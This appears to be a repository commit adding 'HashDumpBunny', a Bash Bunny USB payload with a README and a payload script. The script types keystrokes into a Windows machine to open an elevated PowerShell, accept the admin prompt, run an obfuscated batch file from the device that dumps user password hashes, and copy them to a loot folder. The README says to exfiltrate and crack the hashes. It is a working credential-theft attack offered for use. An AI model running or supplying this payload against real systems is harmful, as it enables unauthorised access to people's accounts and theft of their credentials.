Uploaded HashDumpBunny

Use your BashBunny to dump the user hashes of your target - similar to the msf post-module.
The script was obfuscated with multiple layers, so don't be confused.
If you don't trust this script, run it within a save testing space - which should be best practice anyways ;)

payloads/library/credentials/HashDumpBunny/README.md

@@ -0,0 +1,15 @@
+**Title: HashDumpBunny**
+
+Author: 0iphor13
+
+Version: 1.0
+
+#
+
+**Instruction:**
+
+Place BunnyDump.bat in the same payload switch-folder as your payload.txt
+#
+Plug in BashBunny.
+Exfiltrate the out.txt file and try to crack the hashes.
+![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/credentials/HashDumpBunny/censoredhash.png)

payloads/library/credentials/HashDumpBunny/payload.txt

@@ -0,0 +1,44 @@
+#!/bin/bash
+#
+# Title:         HashDumpBunny
+# Description:   Dump user hashes with this script, which was obfuscated with multiple layers.
+# Author:        0iphor13
+# Version:       1.0
+# Category:      Credentials
+# Attackmodes:   HID, Storage
+
+LED SETUP
+
+Q DELAY 500
+
+GET SWITCH_POSITION
+DUCKY_LANG de
+
+Q DELAY 500
+
+ATTACKMODE HID STORAGE
+
+#LED STAGE1 - DON'T EJECT - PAYLOAD RUNNING
+
+LED STAGE1
+
+#After you have adapted the delays for your target, add "-W hidden"
+Q DELAY 1000
+RUN WIN "powershell Start-Process powershell -Verb runAs"
+Q ENTER
+Q DELAY 1000
+Q ALT j
+Q DELAY 250
+
+Q DELAY 250
+Q STRING "iex((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\BunnyDump.bat')"
+Q DELAY 250
+Q STRING " ;mv out.txt ((gwmi win32_volume -f 'label=''BashBunny''').Name+'\loot');\$bb = (gwmi win32_volume -f 'l"
+Q DELAY 250
+Q STRING "abel=''BashBunny''').Name;Start-Sleep 1;New-Item -ItemType file \$bb'DONE';(New-Object -comObject Shell.Application).Nam"
+Q DELAY 250
+Q STRING "espace(17).ParseName(\$bb).InvokeVerb('Eject');Start-Sleep -s 5;Exit"
+Q DELAY 300
+Q ENTER
+
+LED FINISH